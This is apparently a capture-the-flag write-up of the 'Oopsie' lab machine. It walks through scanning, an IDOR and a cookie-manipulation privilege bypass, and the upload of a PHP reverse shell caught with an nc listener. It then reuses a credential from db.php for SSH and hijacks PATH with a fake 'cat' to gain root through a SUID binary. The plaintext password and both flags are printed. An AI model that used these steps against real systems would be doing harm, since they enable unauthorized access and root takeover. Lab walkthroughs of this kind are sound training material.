Oopsie
Keywords: #cookie_manipulation, #IDOR, #web_spider, #web_app_hacking, #path_hijacking, #SUID, #directory_traversal, #file_upload
Date pwned: 2024-10-31
Nmap scan report for 10.129.14.132
Host is up (0.050s latency).
Not shown: 64950 closed tcp ports (reset), 583 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir -u http://10.129.241.77 -w /usr/share/wordlists/dirb/common.txt
Directory traversal
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.241.77
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.129.241.77/css/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.241.77/fonts/]
/images (Status: 301) [Size: 315] [--> http://10.129.241.77/images/]
/index.php (Status: 200) [Size: 10932]
/js (Status: 301) [Size: 311] [--> http://10.129.241.77/js/]
/server-status (Status: 403) [Size: 278]
/themes (Status: 301) [Size: 315] [--> http://10.129.241.77/themes/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.241.77/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
OWASP ZAP Spider Results
- Login Page - http://10.129.121.239/cdn-cgi/login/
Access ID: 2233
Name: guest
Email: guest@megacorp.com
Get admin's ID through IDOR - 34322
http://10.129.244.186/cdn-cgi/login/admin.php?content=accounts&id=2
TO
http://10.129.244.186/cdn-cgi/login/admin.php?content=accounts&id=1
Manipulate the ID section of cookie to 34322 = Got upload privileges
Upload request
Host: 10.129.244.186
Content-Length: 165516
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.244.186
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvNqgcct1zMDcq2N8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.244.186/cdn-cgi/login/admin.php?content=uploads
Accept-Encoding: gzip, deflate, br
Cookie: role=guest; user=34322
Connection: keep-alive
------WebKitFormBoundaryvNqgcct1zMDcq2N8
Content-Disposition: form-data; name="name"
abcs
------WebKitFormBoundaryvNqgcct1zMDcq2N8
Content-Disposition: form-data; name="fileToUpload"; filename="Hadestown_musical_poster.png"
Content-Type: image/png
‰PNG
From the gobuster we realized the upload directory is:
http://10.129.244.186/uploads/
However 403 Forbidden access
Since this is php, try to upload php-reverse-shell.php to the server
set up net cat listener for the reverse shell
sudo nc -lvnp -443
Try to execute reverse shell
http://10.129.244.186/uploads/php-reverse-shell.php
Got reverse shell on listening side
/home/robert
user.txt -> f2c74ee8db7983851ab2a96a44eb7981
/var/www/html/cdn-cgi/login
db.php -> db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
Login using this credential - Website doesn't work
Login to ssh using this credential
ssh robert@10.129.244.186
Success.
Suid and Guid Misconfiguration
When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a shell or in another way be abuse we could use that to escalate our privileges.
According to the hint, run this command
find / -group bugtracker 2>/dev/null
find, from the root directory, all groups related to bugtracker
robert@oopsie:/$ ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
So bugtracker is owned by root
the s in '-rwsr' means SUID, set owner user ID
It means that every time this file is run, it will be executed as the assigned user, which is root, in this case, rather than the individual running it
robert@oopsie:/$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 9
---------------
cat: /root/reports/9: No such file or directory
The program is running, cat, which indicates something exploitable.
The idea is to trick the system to, instead of running the actual cat program, it runs a /bin/sh shell on behalf of root, so we could get root access.
To do that, we need to have a file "cat" inside of which is the command to run a bash shell.
echo /bin/sh > cat
robert@oopsie:/$ echo /bin/sh > cat
-bash: cat: Permission denied
We can't write it here. But if we cd to /tmp directory, every user could write stuff there.
robert@oopsie:/tmp$ echo /bin/sh > cat
robert@oopsie:/tmp$ ls
cat
Make cat executable
chmod +x cat
In order to have bugtracker execute our malicious cat instead of normal cat, we need to change the PATH variable, which defines what directories are to be searched when executing that variable
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Then, we could run bugtracker, and hopefully whenever it tries to run cat, it will run our malicious cat, which will give us a shell!
robert@oopsie:/tmp$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 2
---------------
# whoami
root
Flag:af13b0bee69f8a877c3faf667f7beacf